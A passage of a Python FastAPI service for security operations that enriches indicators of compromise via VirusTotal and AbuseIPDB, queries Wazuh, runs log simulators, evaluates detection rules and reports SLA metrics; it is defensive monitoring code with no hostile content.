response_model=ApiResponse, summary="IOC enrich", description="Fetch enrichment data for IOC from selected providers without final verdict scoring.", ) async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse: providers = [p.lower().strip() for p in payload.providers] result: dict[str, object] = { "ioc_type": payload.ioc_type, "ioc_value": payload.ioc_value, "providers_requested": providers, "providers": {}, } if "virustotal" in providers: try: vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value) result["providers"] = {**(result.get("providers") or {}), "virustotal": vt} except Exception as exc: repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc if "abuseipdb" in providers: if payload.ioc_type != "ip": result["providers"] = { **(result.get("providers") or {}), "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"}, } else: try: abuse = await abuseipdb_adapter.check_ip(payload.ioc_value) result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse} except Exception as exc: repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload=result, ) return ApiResponse(data={"ioc": result}) @app.post( "/ioc/evaluate", response_model=ApiResponse, summary="IOC evaluate", description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.", ) async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse: providers = [p.lower().strip() for p in payload.providers] supported = {"virustotal", "abuseipdb"} requested = [p for p in providers if p in supported] if not requested: raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].") per_provider: dict[str, dict[str, object]] = {} errors: dict[str, str] = {} if "virustotal" in requested: try: vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value) vt_result, _, _, _ = _build_vt_ioc_result( vt=vt, ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, malicious_threshold=payload.malicious_threshold, suspicious_threshold=payload.suspicious_threshold, ) per_provider["virustotal"] = vt_result except Exception as exc: errors["virustotal"] = str(exc) if "abuseipdb" in requested: if payload.ioc_type != "ip": errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only" else: try: abuse = await abuseipdb_adapter.check_ip(payload.ioc_value) abuse_result, _, _, _ = _build_abuseipdb_ioc_result( abuse=abuse, ioc_value=payload.ioc_value, confidence_threshold=50, ) per_provider["abuseipdb"] = abuse_result except Exception as exc: errors["abuseipdb"] = str(exc) if not per_provider: repo.add_ioc_trace( action="evaluate", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=requested, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(errors), ) raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}") # aggregate decision (max confidence/severity, matched if any provider matched) order = {"low": 1, "medium": 2, "high": 3, "critical": 4} matched = any(bool(r.get("matched")) for r in per_provider.values()) confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values()) severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1)) reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()] if errors: reason_parts.append(f"errors={errors}") ioc_result = { "ioc_type": payload.ioc_type, "ioc_value": payload.ioc_value, "matched": matched, "severity": severity, "confidence": round(confidence, 4), "reason": " | ".join(reason_parts), "providers": per_provider, } repo.add_ioc_trace( action="evaluate", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload=ioc_result, matched=matched, severity=severity, confidence=float(ioc_result["confidence"]), ) return ApiResponse(data={"ioc": ioc_result}) @app.post( "/ioc/upload-file", response_model=ApiResponse, summary="Upload file to VirusTotal", description="Upload a file sample to VirusTotal and return upload/analysis identifiers.", ) async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse: content = await file.read() if not content: raise HTTPException(status_code=400, detail="Uploaded file is empty") try: vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content) except Exception as exc: repo.add_ioc_trace( action="upload_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc repo.add_ioc_trace( action="upload_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)}, ) return ApiResponse(data={"virustotal": vt_upload}) @app.get( "/ioc/analysis/{analysis_id}", response_model=ApiResponse, summary="Get VirusTotal analysis", description="Fetch analysis status/details from VirusTotal by analysis ID.", ) async def ioc_get_analysis(analysis_id: str) -> ApiResponse: try: vt_analysis = await virustotal_adapter.get_analysis(analysis_id) except Exception as exc: repo.add_ioc_trace( action="analysis", ioc_type="hash", ioc_value=analysis_id, providers=["virustotal"], request_payload={"analysis_id": analysis_id}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc repo.add_ioc_trace( action="analysis", ioc_type="hash", ioc_value=analysis_id, providers=["virustotal"], request_payload={"analysis_id": analysis_id}, response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)}, ) return ApiResponse(data={"virustotal": vt_analysis}) @app.post( "/ioc/evaluate-file", response_model=ApiResponse, summary="Evaluate uploaded file IOC", description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.", ) async def ioc_evaluate_file( file: UploadFile = File(...), malicious_threshold: int = 1, suspicious_threshold: int = 3, poll_timeout_seconds: int = 30, poll_interval_seconds: int = 2, ) -> ApiResponse: content = await file.read() if not content: raise HTTPException(status_code=400, detail="Uploaded file is empty") try: vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content) except Exception as exc: repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc analysis_id = ( (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None) or "" ) if not analysis_id: raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID") timeout = max(1, poll_timeout_seconds) interval = max(1, poll_interval_seconds) elapsed = 0 analysis: dict[str, object] = {} while elapsed <= timeout: analysis = await virustotal_adapter.get_analysis(analysis_id) status = ( (((analysis.get("data") or {}).get("attributes") or {}).get("status")) if isinstance(analysis, dict) else None ) if status == "completed": break await asyncio.sleep(interval) elapsed += interval sha256 = ( (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256")) if isinstance(analysis, dict) else None ) if not sha256: raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet") try: vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256)) except Exception as exc: repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=str(sha256), providers=["virustotal"], request_payload={"filename": file.filename, "analysis_id": analysis_id}, response_payload={"upload": vt_upload, "analysis": analysis}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc ioc_result, matched, severity, confidence = _build_vt_ioc_result( vt=vt_file, ioc_type="hash", ioc_value=str(sha256), malicious_threshold=malicious_threshold, suspicious_threshold=suspicious_threshold, ) ioc_result["analysis_id"] = analysis_id ioc_result["filename"] = file.filename repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=str(sha256), providers=["virustotal"], request_payload={"filename": file.filename, "analysis_id": analysis_id}, response_payload={ "upload": vt_upload, "analysis": analysis, "ioc": ioc_result, }, matched=matched, severity=severity, confidence=confidence, ) return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload}) @app.get( "/ioc/history", response_model=ApiResponse, summary="IOC trace history", description="List recent IOC enrichment/evaluation trace records stored in database.", ) async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse: return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)}) @app.get( "/geoip/{ip}", response_model=ApiResponse, summary="GeoIP lookup", description="Lookup geolocation for a public IP address using configured GeoIP provider.", ) async def geoip_lookup(ip: str) -> ApiResponse: result = await geoip_adapter.lookup(ip) return ApiResponse(data={"geoip": result}) @app.get( "/sync/wazuh-version", response_model=ApiResponse, summary="Wazuh version", description="Get Wazuh API/manager version information through adapter.", ) async def sync_wazuh_version() -> ApiResponse: try: wazuh_result = await wazuh_adapter.get_version() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": wazuh_result}) @app.get( "/wazuh/auth-test", response_model=ApiResponse, summary="Wazuh auth test", description="Validate Wazuh API authentication using configured credentials.", ) async def wazuh_auth_test() -> ApiResponse: try: result = await wazuh_adapter.auth_test() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/manager-info", response_model=ApiResponse, summary="Wazuh manager info", description="Return manager information from Wazuh API.", ) async def wazuh_manager_info() -> ApiResponse: try: result = await wazuh_adapter.get_manager_info() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/agents", response_model=ApiResponse, summary="List Wazuh agents", description="List registered Wazuh agents with pagination and optional field selection.", ) async def wazuh_agents( limit: int = 50, offset: int = 0, select: str | None = None, ) -> ApiResponse: try: result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/alerts", response_model=ApiResponse, summary="List Wazuh alerts", description="List alert-like entries from manager logs API for current Wazuh build.", ) async def wazuh_alerts( limit: int = 50, offset: int = 0, q: str | None = None, sort: str | None = None, ) -> ApiResponse: try: # In this Wazuh build, API alerts are exposed via manager logs. result = await wazuh_adapter.list_manager_logs( limit=limit, offset=offset, q=q, sort=sort ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/manager-logs", response_model=ApiResponse, summary="List Wazuh manager logs", description="Query manager logs endpoint with pagination and optional q/sort filters.", ) async def wazuh_manager_logs( limit: int = 50, offset: int = 0, q: str | None = None, sort: str | None = None, ) -> ApiResponse: try: result = await wazuh_adapter.list_manager_logs( limit=limit, offset=offset, q=q, sort=sort ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.post( "/wazuh/sync-to-mvp", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Sync Wazuh to MVP", description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.", ) async def wazuh_sync_to_mvp( limit: int = 50, minutes: int = 120, q: str = "soc_mvp_test=true OR event_type:*", ) -> ApiResponse: try: result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc return ApiResponse(data={"sync": result}) @app.get( "/wazuh/auto-sync/status", response_model=ApiResponse, summary="Wazuh auto-sync status", description="Show auto-sync enablement, settings, task runtime state, and last sync result.", ) async def wazuh_auto_sync_status() -> ApiResponse: state = getattr(app.state, "wazuh_auto_sync_state", {}) task = getattr(app.state, "wazuh_auto_sync_task", None) return ApiResponse( data={ "enabled": settings.wazuh_auto_sync_enabled, "task_running": bool(task and not task.done()), "settings": { "interval_seconds": settings.wazuh_auto_sync_interval_seconds, "limit": settings.wazuh_auto_sync_limit, "minutes": settings.wazuh_auto_sync_minutes, "query": settings.wazuh_auto_sync_query, }, "state": state, } ) @app.get( "/monitor/db/tables", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List database tables", description="List soc-integrator PostgreSQL tables with row count and relation size.", ) async def monitor_db_tables() -> ApiResponse: rows: list[dict[str, object]] = [] with get_conn() as conn, conn.cursor() as cur: cur.execute( """ SELECT t.schemaname, t.tablename, COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows, COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes, COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty FROM pg_tables t LEFT JOIN pg_stat_user_tables s ON s.schemaname = t.schemaname AND s.relname = t.tablename WHERE t.schemaname = 'public' ORDER BY t.tablename """ ) tables = cur.fetchall() for item in tables: schema = str(item.get("schemaname") or "public") table = str(item.get("tablename") or "") if not table: continue cur.execute( sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format( sql.Identifier(schema), sql.Identifier(table), ) ) count_row = cur.fetchone() or {} row_count = int(count_row.get("cnt", 0) or 0) rows.append( { "schema": schema, "table": table, "row_count": row_count, "estimated_rows": int(item.get("estimated_rows", 0) or 0), "size_bytes": int(item.get("size_bytes", 0) or 0), "size_pretty": str(item.get("size_pretty") or "0 bytes"), } ) return ApiResponse( data={ "database": settings.soc_integrator_db_name, "generated_at": datetime.now(timezone.utc).isoformat(), "tables": rows, } ) @app.get( "/monitor/db/tables/{table_name}/rows", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List rows from selected table", description="Return rows from a selected public table with pagination.", ) async def monitor_db_table_rows( table_name: str, limit: int = 50, offset: int = 0, ) -> ApiResponse: table = str(table_name or "").strip() if not table: raise HTTPException(status_code=400, detail="table_name is required") page_limit = max(1, min(int(limit), 500)) page_offset = max(0, int(offset)) with get_conn() as conn, conn.cursor() as cur: cur.execute( """ SELECT 1 FROM pg_tables WHERE schemaname = 'public' AND tablename = %s LIMIT 1 """, (table,), ) if not cur.fetchone(): raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public") cur.execute( sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format( sql.Identifier("public"), sql.Identifier(table), ) ) total_row = cur.fetchone() or {} total = int(total_row.get("cnt", 0) or 0) cur.execute( sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format( sql.Identifier("public"), sql.Identifier(table), ), (page_limit, page_offset), ) rows = [dict(item) for item in (cur.fetchall() or [])] return ApiResponse( data={ "table": table, "limit": page_limit, "offset": page_offset, "total": total, "rows": rows, } ) @app.get( "/monitor/systems", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Systems monitor overview", description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.", ) async def monitor_systems( minutes: int = 60, limit: int = 20, include_raw: bool = False, ) -> ApiResponse: window_minutes = max(1, minutes) row_limit = max(1, limit) now = datetime.now(timezone.utc) since = now - timedelta(minutes=window_minutes) now_iso = now.isoformat() dependencies = await mvp_service.dependency_health() monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}}) last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {}) # KPI counters from persisted database records in the selected lookback window. alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh") detections_matched = repo.count_c_detection_events_since(since=since) iris_tickets_created = repo.count_incidents_with_iris_since(since=since) pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True) pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False) wazuh_recent: list[object] = [] wazuh_recent_error: str | None = None try: wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None) wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit] except Exception as exc: wazuh_recent_error = str(exc) shuffle_recent: list[object] = [] shuffle_recent_error: str | None = None try: workflows_resp = await shuffle_adapter.list_workflows() workflows = _extract_first_array(workflows_resp) for item in workflows[:row_limit]: if isinstance(item, dict): shuffle_recent.append( { "id": item.get("id") or item.get("workflow_id"), "name": item.get("name") or item.get("workflow", {}).get("name"), "status": item.get("status"), } ) else: shuffle_recent.append(item) except Exception as exc: shuffle_recent_error = str(exc) iris_recent: list[object] = [] iris_recent_error: str | None = None try: iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0) iris_recent = _extract_first_array(iris_resp)[:row_limit] except Exception as exc: iris_recent_error = str(exc) pagerduty_recent = repo.list_recent_escalations(limit=row_limit) def build_card( label: str, dependency_key: str, recent: list[object], kpis: dict[str, object], extra_error: str | None = None, ) -> dict[str, object]: dep = dependencies.get(dependency_key, {}) dep_status = str(dep.get("status") or "down") status = "ok" if dep_status == "up" else "down" if dep_status == "up": last_ok_at_by_key[label] = now_iso error_parts: list[str] = [] if dep.get("error"): error_parts.append(str(dep.get("error"))) if extra_error: error_parts.append(extra_error) if dep_status == "up" and extra_error: status = "degraded" card: dict[str, object] = { "status": status, "latency_ms": dep.get("latency_ms"), "last_ok_at": last_ok_at_by_key.get(label), "last_error": " | ".join(error_parts) if error_parts else None, "kpis": kpis, "recent": recent, } if include_raw: card["raw"] = dep.get("details") return card cards = { "wazuh": build_card( label="wazuh", dependency_key="wazuh", recent=wazuh_recent, extra_error=wazuh_recent_error, kpis={ "alerts_ingested": alerts_ingested, "recent_rows": len(wazuh_recent), }, ), "shuffle": build_card( label="shuffle", dependency_key="shuffle", recent=shuffle_recent, extra_error=shuffle_recent_error, kpis={ "recent_workflows": len(shuffle_recent), }, ), "iris": build_card( label="iris", dependency_key="iris", recent=iris_recent, extra_error=iris_recent_error, kpis={ "tickets_created": iris_tickets_created, "recent_rows": len(iris_recent), }, ), "pagerduty": build_card( label="pagerduty", dependency_key="pagerduty_stub", recent=pagerduty_recent, kpis={ "escalations_sent": pagerduty_escalations_sent, "escalations_failed": pagerduty_escalations_failed, }, ), } app.state.systems_monitor_state = monitor_state return ApiResponse( data={ "generated_at": now_iso, "window_minutes": window_minutes, "cards": cards, "pipeline": { "alerts_ingested": alerts_ingested, "detections_matched": detections_matched, "iris_tickets_created": iris_tickets_created, "pagerduty_escalations_sent": pagerduty_escalations_sent, "pagerduty_escalations_failed": pagerduty_escalations_failed, }, } ) @app.get( "/sim/logs/runs", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List simulator runs", description="List active and recent simulator script runs started from soc-integrator.", ) async def sim_logs_runs() -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) items: list[dict[str, object]] = [] for run_id, run in sim_runs.items(): serialized = _serialize_sim_run(run_id, run) if (not serialized["running"]) and not run.get("stopped_at"): run["stopped_at"] = datetime.now(timezone.utc).isoformat() serialized["stopped_at"] = run["stopped_at"] items.append(serialized) items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True) return ApiResponse(data={"items": items}) @app.post( "/sim/logs/start", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Start simulator logs script", description="Start a whitelisted simulator script in background and return run metadata.", ) async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse: script_name = SIM_SCRIPT_MAP[payload.script] script_path = SIM_SCRIPTS_DIR / script_name if not script_path.exists(): raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}") cmd = _build_sim_command(payload) env = dict(os.environ) env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager") env.setdefault("WAZUH_SYSLOG_PORT", "514") run_id = str(uuid.uuid4()) log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log" log_handle = None try: log_handle = log_file.open("ab") process = subprocess.Popen( cmd, cwd=str(SIM_SCRIPTS_DIR), env=env, stdout=log_handle, stderr=subprocess.STDOUT, start_new_session=True, ) except Exception as exc: if log_handle: try: log_handle.close() except Exception: pass raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc finally: if log_handle: log_handle.close() sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) sim_runs[run_id] = { "script": payload.script, "target": payload.target, "scenario": payload.scenario, "count": payload.count, "delay_seconds": payload.delay_seconds, "forever": payload.forever, "pid": process.pid, "cmd": " ".join(shlex.quote(part) for part in cmd), "started_at": datetime.now(timezone.utc).isoformat(), "stopped_at": None, "return_code": None, "log_file": str(log_file), "process": process, } app.state.sim_runs = sim_runs return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])}) @app.post( "/sim/logs/stop/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Stop simulator run", description="Stop a running simulator script by run_id.", ) async def sim_logs_stop(run_id: str) -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") process = run.get("process") if process and process.poll() is None: try: process.terminate() process.wait(timeout=3) except subprocess.TimeoutExpired: process.kill() except Exception as exc: raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc run["stopped_at"] = datetime.now(timezone.utc).isoformat() return ApiResponse(data={"run": _serialize_sim_run(run_id, run)}) @app.post( "/sim/logs/stop-running", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Stop all running simulator runs", description="Stop all currently running simulator scripts (including forever mode).", ) async def sim_logs_stop_running() -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) stopped: list[dict[str, object]] = [] already_stopped = 0 for run_id, run in sim_runs.items(): process = run.get("process") if process and process.poll() is None: try: process.terminate() process.wait(timeout=3) except subprocess.TimeoutExpired: process.kill() except Exception as exc: raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc run["stopped_at"] = datetime.now(timezone.utc).isoformat() stopped.append(_serialize_sim_run(run_id, run)) else: already_stopped += 1 return ApiResponse( data={ "stopped_count": len(stopped), "already_stopped_count": already_stopped, "runs": stopped, } ) @app.get( "/sim/logs/output/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Get simulator run output", description="Return tailed output lines from simulator run log file.", ) async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") log_file_path = run.get("log_file") if not log_file_path: raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}") log_file = Path(str(log_file_path)) lines = _tail_log_lines(log_file, limit=limit) process = run.get("process") running = bool(process and process.poll() is None) return ApiResponse( data={ "run_id": run_id, "running": running, "line_count": len(lines), "lines": lines, "text": "\n".join(lines), "log_file": str(log_file), } ) @app.get( "/sim/logs/wazuh-latest/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Get latest Wazuh logs/rules for simulator run", description="Return latest Wazuh event logs and matched rules correlated to a simulator run.", ) async def sim_logs_wazuh_latest( run_id: str, limit: int = 50, minutes: int = 15, include_raw: bool = False, ) -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") requested_minutes = max(1, int(minutes)) # Keep query unfiltered and use a wide lookback to emulate Discover "latest records". effective_minutes = max(1440, requested_minutes) query_limit = max(1, min(int(limit), 200)) query_text = "*" try: raw = await wazuh_adapter.search_alerts( query=query_text, limit=query_limit, minutes=effective_minutes, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc hits = _extract_wazuh_hits(raw) events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits] rules: list[dict[str, object]] = [] for hit in hits: rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw) if rule_item: rules.append(rule_item) return ApiResponse( data={ "run": _serialize_sim_run(run_id, run), "query": { "effective_minutes": effective_minutes, "text": query_text, "limit": query_limit, }, "events": events, "rules": rules, "totals": { "events": len(events), "rules": len(rules), }, } ) @app.post( "/monitor/log-loss/check", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Check log loss", description="Check expected telemetry streams for missing logs in a configurable lookback window.", ) async def monitor_log_loss_check( payload: LogLossCheckRequest | None = None, create_ticket: bool = False, ) -> ApiResponse: req = payload or LogLossCheckRequest() result = await _execute_log_loss_check(req=req, create_ticket=create_ticket) return ApiResponse(data=result) @app.post( "/monitor/c-detections/evaluate", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Evaluate Appendix C detections", description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.", ) async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse: if not settings.c_detection_enabled: raise HTTPException(status_code=400, detail="C detection is disabled by configuration") started_at = datetime.now(timezone.utc).isoformat() app.state.c_detection_state["last_started_at"] = started_at try: raw = await wazuh_adapter.search_alerts( query=payload.query, limit=max(1, payload.limit), minutes=max(1, payload.minutes), ) hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else [] normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits] evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors) records: list[dict[str, object]] = [] for match in evaluated.get("matches", []): usecase_id = str(match.get("usecase_id") or "") entity = str(match.get("entity") or "unknown") severity = str(match.get("severity") or "medium") evidence = dict(match.get("evidence") or {}) event_ref = { "event_id": ((match.get("event") or {}).get("event_id")), "timestamp": ((match.get("event") or {}).get("timestamp")), "source": ((match.get("event") or {}).get("source")), } in_cooldown = repo.is_c_detection_in_cooldown( usecase_id=usecase_id, entity=entity, cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds), ) incident_key: str | None = None event_row = repo.add_c_detection_event( usecase_id=usecase_id, entity=entity, severity=severity, evidence=evidence, event_ref=event_ref, incident_key=None, ) if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown: incident_event = _c_match_to_incident_event(match) ingest = await mvp_service.ingest_incident(incident_event) incident_key = str(ingest.get("incident_key") or "") or None repo.update_c_detection_incident(int(event_row["id"]), incident_key) records.append( { "id": event_row["id"], "usecase_id": usecase_id, "entity": entity, "severity": severity, "incident_key": incident_key, "cooldown_active": in_cooldown, "evidence": evidence, } ) result = { "query": payload.query, "minutes": max(1, payload.minutes), "selectors": payload.selectors, "dry_run": payload.dry_run, "summary": evaluated.get("summary", {}), "matches": records, "total_hits": len(hits), } app.state.c_detection_state["last_status"] = "ok" app.state.c_detection_state["last_result"] = result app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() return ApiResponse(data=result) except Exception as exc: app.state.c_detection_state["last_status"] = "error" app.state.c_detection_state["last_error"] = str(exc) app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc @app.get( "/monitor/c-detections/history", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="C detection history", description="List persisted C1-C3 detection matches, including evidence and linked incident keys.", ) async def monitor_c_detections_history( limit: int = 50, offset: int = 0, usecase_id: str | None = None, ) -> ApiResponse: rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id) return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id}) @app.get( "/monitor/c-detections/state", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="C detection state", description="Return Appendix C detection settings and last evaluation runtime state.", ) async def monitor_c_detections_state() -> ApiResponse: return ApiResponse( data={ "enabled": settings.c_detection_enabled, "settings": { "window_minutes": settings.c_detection_window_minutes, "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph, "c2_offhours_start_utc": settings.c2_offhours_start_utc, "c2_offhours_end_utc": settings.c2_offhours_end_utc, "c3_host_spread_threshold": settings.c3_host_spread_threshold, "c3_scan_port_threshold": settings.c3_scan_port_threshold, "create_iris_ticket": settings.c_detection_create_iris_ticket, "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds, }, "state": getattr(app.state, "c_detection_state", {}), } ) # --------------------------------------------------------------------------- # KPI Timeout helpers and IRIS alert routes # --------------------------------------------------------------------------- SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400} def compute_kpi( created_at: str, severity_name: str, resolved_at: str | None = None, ) -> dict[str, object]: sla = SLA_SECONDS.get(severity_name, 28800) def _parse(ts: str) -> datetime: dt = datetime.fromisoformat(ts.replace("Z", "+00:00")) return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc) start = _parse(created_at) thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)] if resolved_at: end = _parse(resolved_at) elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date elapsed_pct = min(elapsed / sla * 100, 100) kpi_pct = max(100 - elapsed_pct, 0) segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds] return { "kpi_pct": round(kpi_pct, 1), "elapsed_pct": round(elapsed_pct, 1), "status": "Resolved", "segments": segments, "resolved": True, } elapsed = (datetime.now(timezone.utc) - start).total_seconds() elapsed_pct = min(elapsed / sla * 100, 100) kpi_pct = max(100 - elapsed_pct, 0) segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds] if 